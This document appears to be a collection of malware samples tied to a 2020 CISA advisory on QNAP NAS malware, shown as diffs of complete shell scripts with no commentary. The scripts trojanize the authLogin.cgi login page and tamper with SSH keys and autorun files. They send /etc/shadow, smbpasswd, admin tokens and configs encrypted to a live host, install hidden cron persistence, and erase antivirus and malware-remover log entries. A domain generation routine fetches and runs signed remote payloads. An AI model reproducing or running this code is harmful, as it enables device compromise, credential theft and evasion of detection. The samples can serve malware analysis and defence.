+		if [ "x${rsynchash}" = "x${binhash}" ]; then
+			test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
+			mv "${cgibindir}"/authLogin.cgi "${cgibindir}"/sysauthLogin.cgi && test -f "${cgibindir}"/sysauthLogin.cgi && mv '.qal' "${cgibindir}"/authLogin.cgi && chmod 755 "${cgibindir}"/authLogin.cgi
+		fi
+		test -f '.qal' && rm -f '.qal'
+	fi
+fi
+
+if  [ -f "${cgibindir}"/authLogin.cgi ] && "${cgibindir}"/authLogin.cgi | grep '<QDocRoot'; then
+:
+else
+test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
+fi
+
+test -f /etc/config/.qsync.conf && authkeysfile=$(grep AuthorizedKeysFile /etc/config/.qsync.conf | sed 's/"//g' | cut -d ' ' -f 2)
+if [ "$authkeysfile" ] && [ -f "$authkeysfile" ] && grep 'miOGcmendZU2r10SdZVplBQ4i' "$authkeysfile"; then
+sed -i '/miOGcmendZU2r10SdZVplBQ4i/d' "$authkeysfile"
+lsofout="$(lsof +c 0 -i -n -P | grep :51163)"
+sshpid="$(echo "$lsofout" | tr -s ' ' | cut -d ' ' -f 2 | head -n 1)"
+kill -2 "$sshpid"
+fi
+
+if [ ! -f '1548997200_c' ]; then
+touch '1548997200_c'
+mdir=`mktemp -d /tmp/.mount.XXXXXX` || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; } || mdir=`mktemp -d "${bdir}/.mount.XXXXXX"` || { mdir="${bdir}/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "/mnt/HDA_ROOT/.mount.XXXXXX"` || { mdir="/mnt/HDA_ROOT/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "/.mount.XXXXXX"` || { mdir="/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "./.mount.XXXXXX"` || { mdir="./.mount.jbbxQob"; mkdir ${mdir}; }
+__BOOT_DEV=
+__model=`getcfg System "Internal Model"`
+CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
+CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
+CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
+__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; } 
+command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
+test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
+test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }
+
+if [ $? -eq 0 ] || mount | grep "$mdir" >/dev/null; then
+for file in "${mdir}"/K01* "${mdir}/autorun.sh" '/tmp/config/autorun.sh'; do
+if [ -f "$file" ]; then
+sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'\
+verifykey="${verifykey}"'"'"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/'
+grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex'
+sedreplace "$grepstring" "$sedcmd" "$file"
+sedcmd='s/g4rwwSz1Bp1i1'"'"'/g4rwwS'"''"'z1Bp1i1'"'"'/'
+grepstring='g4rwwSz1Bp1i1'"'"
+sedreplace "$grepstring" "$sedcmd" "$file"
+test -f '.qdisk_cmd' && ./.qdisk_cmd +ia "$file"
+fi
+done
+fi
+umount "$mdir"
+rmdir "$mdir"
+fi
+
+if [ ! -f '1553058001_c' ]; then
+touch '1553058001_c'
+key=$(tr -dc 'a-zA-Z0-9' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
+test "x$key" = 'x' && key=$(LC_ALL=C sed 's/[^a-zA-Z0-9]//g' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
+{ echo "$key" | openssl rsautl -pubin -inkey .rsakey -encrypt | openssl enc -base64 -A; printf ':'
+{ echo; for file in "${bdir}/.log/.rqsys.log" /etc/config/.qos_config/users/admin/.qtoken /etc/config/.qos_config/users/admin/secondSV.conf /etc/config/smbpasswd /etc/shadow /etc/config/*.conf /etc/default_config/*.conf /etc/*.conf /etc/config/.*.conf /etc/default_config/.*.conf /etc/.*.conf; do printf '%s:' "$file"; cat "$file"; echo; done; printf '%s:' "authLogin.cgi"; /home/httpd/cgi-bin/authLogin.cgi; printf '%s:' "display_name"; /sbin/get_display_name; } | gzip | { dd bs=4096 count=512 || head -c 2097152 || cat; } | openssl enc -aes-256-cbc -k "$key" -md md5 -salt -a -A; } | curl --connect-timeout 12 -m 300 -k -d '@-' "https://qpqift.top/ping.pl"
+fi
+
+if [ ! -f 1551848403_c ]; then
+touch 1551848403_c
+test -f liveupdate.sh && cronscriptpath=.liveupdate/liveupdate.sh || { test -f backup_conf.sh && cronscriptpath=.config/backup_conf.sh; }
+
+if [ ! -z $cronscriptpath ]; then
+test -d "${bdir}/.system" || mkdir -p "${bdir}/.system"
+echo '(exec>/dev/null>&1 2>&1;(PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin";openssl base64 -d -A <<"EOF"|sh&' > "${bdir}/.system/.qinstaller.sh"
+chmod 755 "${bdir}/.system/.qinstaller.sh"
+{
+cat <<"XXEOF"
+( exec >/dev/null 2>&1; (
+export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
+command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+test -d "$confdir" || confdir=/etc/config
+command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
+\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
+//I;s/\(^\|\
+\)\[[^\
+]\+\]\
+.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
+bdir=
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
+echo 'ab*c' | grep -F 'ab*c' >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
+test "$fgrep" || fgrep=grep
+sleep 5
+XXEOF
+cat <<XXEOF
+if [ ! -f "\${bdir}/.qpkg/${cronscriptpath}" ]; then
+set_mutable() {
+    if [ ! -e "\$1" ]; then
+        return 0
+    fi
+    if [ -e /etc/IS_64BITS ]; then
+        # 64bit set mutable
+        SET_M_64="\$1"
+        python -c "import os,fcntl,sys,struct;fd = os.open('\${SET_M_64}', os.O_RDONLY); rec = struct.pack('L', 0); x = fcntl.ioctl(fd, 0x80086601, rec); flags = struct.unpack('L',x)[0]; was_immutable = flags & 0x00000010; flags = flags & ~0x00000010; f = struct.pack('i', flags); fcntl.ioctl(fd, 0x40086602, f); os.close(fd)"
+    else
+        # 32bit set mutable
+        SET_M_32="\$1"
+        python -c "import os,fcntl,sys,struct;fd = os.open('\${SET_M_32}', os.O_RDONLY); rec = struct.pack('L', 0); x = fcntl.ioctl(fd, 0x80046601, rec); flags = struct.unpack('L',x)[0]; was_immutable = flags & 0x00000010; flags = flags & ~0x00000010; f = struct.pack('i', flags); fcntl.ioctl(fd, 0x40046602, f); os.close(fd)"
+    fi
+}
+test -f "\${bdir}/.qpkg/${cronscriptpath%/*}" || test -h "\${bdir}/.qpkg/${cronscriptpath%/*}" && { set_mutable "\${bdir}/.qpkg/${cronscriptpath%/*}"; rm -f "\${bdir}/.qpkg/${cronscriptpath%/*}"; }
+test -d "\${bdir}/.qpkg" || mkdir -p "\${bdir}/.qpkg" || mkdir "\${bdir}/.qpkg"
+test -d "\${bdir}/.qpkg/${cronscriptpath%/*}" || mkdir "\${bdir}/.qpkg/${cronscriptpath%/*}"
+cat > "\${bdir}/.qpkg/${cronscriptpath}" <<"XEOF"
+XXEOF
+cat "${cronscriptpath#*/}"
+cat <<XXEOF
+XEOF
+chmod 755 "\${bdir}/.qpkg/${cronscriptpath}"
+touch -cr /bin/busybox "\${bdir}/.qpkg/${cronscriptpath}"
+( ( exec >/dev/null 2>&1 </dev/null; "\${bdir}/.qpkg/${cronscriptpath}" </dev/null >/dev/null 2>/dev/null & ) & )
+fi
+
+test -x "\${bdir}/.qpkg/${cronscriptpath}" || chmod 755 "\${bdir}/.qpkg/${cronscriptpath}"
+
+crontabargs=\$(ps | grep 'cr[o]nd ' | sed -n 's/.*crond[^0-9A-Za-z-]*\\(.\\+\\)/\\1/p')
+trycount=10; trycount=\$(( \$trycount - 10 ))
+set x \$crontabargs; shift
+while [ \$# -gt 0 ] && [ \$trycount -lt 10 ]; do
+trycount=\$(( \$trycount + 1 ))
+getopts ':c:' OPT 2>/dev/null
+test "\$OPT" = 'c' && crontabfile="\${OPTARG}/admin" && break
+test "\$OPTIND" -gt 0 && shift "\$OPTIND" && OPTIND=1 || break
+done
+test "\$crontabfile" && test -f "\${crontabfile}" || crontabfile='/tmp/cron/crontabs/admin'
+
+for crontab in "\$crontabfile" "\${confdir}/crontab"; do
+if \$fgrep "\${bdir}/.qpkg/${cronscriptpath}" "\$crontab"; then
+:
+else
+cronmins=\$(printf '%i' "\$(( \$RANDOM % 60 ))")
+cronhour=\$(printf '%i' "\$(( \$RANDOM % 24 ))")
+cronhour=\$(printf '%i,' "\$(( ( \$cronhour + 8 ) % 24 ))" "\$(( ( \$cronhour + 16 ) % 24 ))")"\$cronhour"
+echo "\$cronmins \$cronhour"' * * * '"\${bdir}/.qpkg/${cronscriptpath} >/dev/null 2>/dev/null" >> "\$crontab"
+crontab "\$crontab"
+sleep 2
+fi
+done
+) & ) &
+XXEOF
+} | { openssl base64 -A; echo; echo 'EOF'; echo ')&)'; } >> "${bdir}/.system/.qinstaller.sh"
+{ { crontab -l || cat /etc/config/crontab; } | grep -v '^ *#' | awk '{ print $6 }'; sed -n 's/^ \?[Ss]hell \?= \?//p' /etc/config/qpkg.conf; } | grep '/' | sort | uniq | while IFS= read -r line; do
+test ! -z "$line" || continue
+test -f "$line" || continue
+test "$line" = $(pwd)/liveupdate.sh || test "$line" = $(pwd)/backup_conf.sh && continue
+grep '/\.system/\.qinstaller\.sh"; exit' "$line" && continue
+head -n 1 "$line" | grep '^#! \?/bin/b\?a\?sh' || continue;
+tab='	'
+test "${#tab}" -eq 1 || tab=$(printf '\011') || tab=$(echo -e '\011')
+sed -i 's!^\([ '"$tab"']\{1,\}\)exit\([ '"$tab"']\{1,\}[0-9]\{1,\}\)\{0,1\}\(\;\{0,1\}[ '"$tab"']*\)$!\1{ '"${bdir}/.system/.qinstaller.sh"'; exit\2; }\3!;s!^exit\([ '"$tab"']\{1,\}[0-9]\{1,\}\)\{0,1\}\(\;\{0,1\}[ '"$tab"']*\)$!{ '"${bdir}/.system/.qinstaller.sh"'; exit\1; }!;s!/.qpkg/.q\{0,1\}installer.sh; exit!/.system/.qinstaller.sh; exit!' "$line"
+hash=''
+hash=$(sed -n '2,5p' "$line" | md5sum)
+hash=${hash%${hash##*[0-9a-f]}}; hash=${hash#${hash%%[0-9a-f]*}}
+trycnt=20
+while [ "x$hash" = 'x18ec5ab42dc1231da518951e4479c27b' ] && [ "$trycnt" -gt 0 ]; do
+trycnt=$(( $trycnt - 1))
+sed -i '2,5d' "$line"
+hash=''
+hash=$(sed -n '2,568{/key=/d;s/\.liveupdate\/liveupdate\.sh//g;s/\.config\/backup_conf\.sh//g;p}' "$line" | md5sum)
+hash=${hash%${hash##*[0-9a-f]}}; hash=${hash#${hash%%[0-9a-f]*}}
+done
+done
+fi
+fi
+
+test -f "${ts}_c" || touch "${ts}_c"
+rm -f "${CWD}/".tmp.*
+exit 0

2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/3cb052a7da6cda9609c32b5bafa11b76c2bb0f74b61277fecf464d3c0baeac0e

@@ -0,0 +1,107 @@
+export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
+
+command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
+
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+
+bdir=
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
+grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
+
+EOF
+test "$fgrep" || fgrep=grep
+test "$RANDOM" || RANDOM=17653
+genrstr () 
+{ 
+    local s=;
+    local min=${1:-4};
+    local max=${2:-12};
+    local kspace="${3:-a-zA-Z}"
+    tr -dc "$kspace" < /dev/urandom | { 
+        read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
+        echo "$s"
+    }
+}
+
+verifyfile() {
+local file="$1"
+local sig="${2:-$file_s}"
+local out
+test ! -z "$file" && test -s "$file" || return 1
+test ! -z "$sig" && test -s "$sig" || return 1
+test -f ".rsakey" || echo "$verifykey" > ".rsakey"
+out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
+return 1
+}
+
+decryptfile() {
+local file="$1"
+local ofile="${2:-${file}}"
+local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
+openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
+test -f "$ofile" && rm -f "$ofile"
+mv "${file}_d" "$ofile" && return 0
+return 1
+}
+
+verifykey='-----BEGIN PUBLIC KEY-----
+MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
+CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
+verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
+RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
+Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
+gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
+2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
+0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
+pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
+DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
+-----END PUBLIC KEY-----'
+
+DOMAIN_EXT_A='cf tk ml ga gq'
+DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
+
+test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
+test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
+cd "${bdir}/.qpkg/.liveupdate" && rm -f .tmp.*
+
+echo "$verifykey" > ".rsakey"
+i=0 n=0 c=0 errorcount=0
+outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
+
+for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
+        for ext in $domainexts; do
+                hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
+                hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
+                hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
+                hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
+                for host in $hostnames; do
+                        test -f "$outfile" && rm -f "$outfile"
+                        recentupdate=''
+                        curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
+                        test -s "$outfile" || continue
+                        fsize=$(( $(wc -c < "$outfile") ))
+                        test "$fsize" -gt 4096 && rm -f "$outfile" && continue
+                        rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
+                        test "$rsamsg" || continue
+                        path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
+                        hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
+                        test "$rsadomain" = "${host}.${ext}" || continue
+                        timenow=$(date +%s)
+                        test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
+                        curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
+                        filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
+                        test "$filehash" = "$hash" || continue
+                        curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
+                        verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
+                        mv "${outfile}_s" "${ts}_v"
+                        chmod 755 "$outfile" || continue
+                        ( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" ) & )
+                        test "$recentupdate" -eq 1 && exit 0
+                done
+        done
+done

2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/473c5df2617cee5a1f73880c2d66ad9668eeb2e6c0c86a2e9e33757976391d1a

@@ -0,0 +1,389 @@
+#!/bin/bash
+ts=1549432800
+PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin"
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"` && test -d "$bdir" || bdir=''
+test -z "${bdir}" || test ! -d "${bdir}"; } && { while read -r bdir; do
+test -d "$bdir" && break; bdir=''
+done <<EOF
+$(mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp")
+EOF
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in {{CE_,}CACHEDEV{1,2,3},MD0,HDA}_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { bdir=/mnt/HDA_ROOT && test -d "$bdir" || bdir='/'; }; }
+
+getcfg MalwareRemover Version -f /etc/config/qpkg.conf && setcfg MalwareRemover Version 3.4.1 -f /etc/config/qpkg.conf
+getcfg MalwareRemover Date -f /etc/config/qpkg.conf && setcfg MalwareRemover Date 2019-01-25 -f /etc/config/qpkg.conf
+getcfg MalwareRemover Build -f /etc/config/qpkg.conf && setcfg MalwareRemover Build 20190125 -f /etc/config/qpkg.conf
+
+if grep "clamav\.net" /etc/hosts; then
+sed -i '/0.0.0.0 .*clamav\.net/d' /etc/hosts
+fi
+
+if grep '0\.0\.0\.0 update\.nai\.com' /etc/hosts; then
+sed -i '/0\.0\.0\.0 update\.nai\.com/d' /etc/hosts
+fi
+
+test -z "$PWD" && PWD=$(pwd)
+CWD="$PWD"
+if [ "${CWD%/*}" != "${bdir}/.qpkg" ]; then
+        CWD=''
+        for dir in '.config' '.liveupdate'; do
+                dir="${bdir}/.qpkg/${dir}"
+                test -d "$dir" && cd "$dir" && CWD="$dir" && break
+        done
+fi
+test "$CWD" && test -d "$CWD" && cd "$CWD"
+
+sedreplace () {
+local grepstring="$1" sedcmd="$2" file="$3"
+[ "$grepstring" ] && [ "$sedcmd" ] && [ "$file" ] || return 1
+if grep "$grepstring" "$file"; then
+test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
+sed -i "$sedcmd" "$file"
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
+fi
+return $?
+}
+
+for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
+file=''
+[ -f "${path#*/}" ] && file="${path#*/}" || { [ -f "${bdir}/.qpkg/${path}" ] && file="${bdir}/.qpkg/${path}"; }
+if [ "x${file}" != 'x' ]; then
+sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'\
+verifykey="${verifykey}"'"'"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/'
+grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex'
+sedreplace "$grepstring" "$sedcmd" "$file"
+sedcmd='s/g4rwwSz1Bp1i1'"'"'/g4rwwS'"''"'z1Bp1i1'"'"'/'
+grepstring='g4rwwSz1Bp1i1'"'"
+sedreplace "$grepstring" "$sedcmd" "$file"
+fi
+done
+file=''
+
+if [ ! -f '1548766800_c' ]; then
+if getcfg Antivirus AutoUpdateDBEnable -f /etc/config/antivirus.global | grep -i TRUE; then
+test -f '/mnt/HDA_ROOT/.logs/notice.log' && python <<"EOF"
+import sqlite3
+conn = sqlite3.connect('/mnt/HDA_ROOT/.logs/notice.log')
+c = conn.cursor()
+c.execute("DELETE FROM NASLOG_NOTICE WHERE time > 1547096400 AND desc LIKE '[AntiVirus] Failed to update virus definitions%'")
+conn.commit()
+conn.close()
+exit()
+EOF
+test -f '/mnt/HDA_ROOT/.logs/event.log' && python <<"EOF"
+import sqlite3
+conn = sqlite3.connect('/mnt/HDA_ROOT/.logs/event.log')
+c = conn.cursor()
+c.execute("DELETE FROM NASLOG_EVENT WHERE event_timet > 1547096400 AND event_desc LIKE '[AntiVirus] Failed to update virus definitions%'")
+conn.commit()
+conn.close()
+exit()
+EOF
+fi
+if getcfg MalwareRemover Enable -f /etc/config/qpkg.conf | grep -i 'true' || grep 'MalwareRemover' '/etc/config/crontab' '/tmp/cron/crontabs/admin'; then
+test -f '/mnt/HDA_ROOT/.logs/notice.log' && python <<"EOF"
+import sqlite3
+conn = sqlite3.connect('/mnt/HDA_ROOT/.logs/notice.log')
+c = conn.cursor()
+c.execute("DELETE FROM NASLOG_NOTICE WHERE time > 1547964000 AND desc LIKE '[MalwareRemover] Malware Remover stopped%'")
+conn.commit()
+conn.close()
+exit()
+EOF
+test -f '/mnt/HDA_ROOT/.logs/event.log' && python <<"EOF"
+import sqlite3
+conn = sqlite3.connect('/mnt/HDA_ROOT/.logs/event.log')
+c = conn.cursor()
+c.execute("DELETE FROM NASLOG_EVENT WHERE event_timet > 1547964000 AND event_desc LIKE '[MalwareRemover] Malware Remover stopped%'")
+conn.commit()
+conn.close()
+exit()
+EOF
+touch "1548766800_c"
+fi
+fi
+
+if [ ! -f ".qdisk_cmd" ]; then
+	case "$(uname -m)" in 
+	*x86_64*)
+			arch=x86_64
+			binhash='g2oe7EJJVCiAHY6AG1I1c/lGF8Y='
+			;;
+	*arm*|*aarch*)
+			arch=arm
+			binhash='Z3twHZvQqYZ1vLeu4PLnZekdkRY='
+			;;
+	*i*86*)
+			arch=i486
+			binhash='gWzECXuIp3dz5yI7RJS9d4+xpq4='
+			;;
+	esac
+	
+	if [ "x${binhash}" != 'x' ]; then
+		curl --connect-timeout 12 -m 1200 -k -o ".qdisk_cmd.tmp" "https://qpqift.top/data/qdisk_cmd_${arch}" || rm -f ".qdisk_cmd.tmp"
+		test -f '.qdisk_cmd.tmp' && rsynchash="$(openssl dgst -sha1 -binary ".qdisk_cmd.tmp" | openssl base64)"
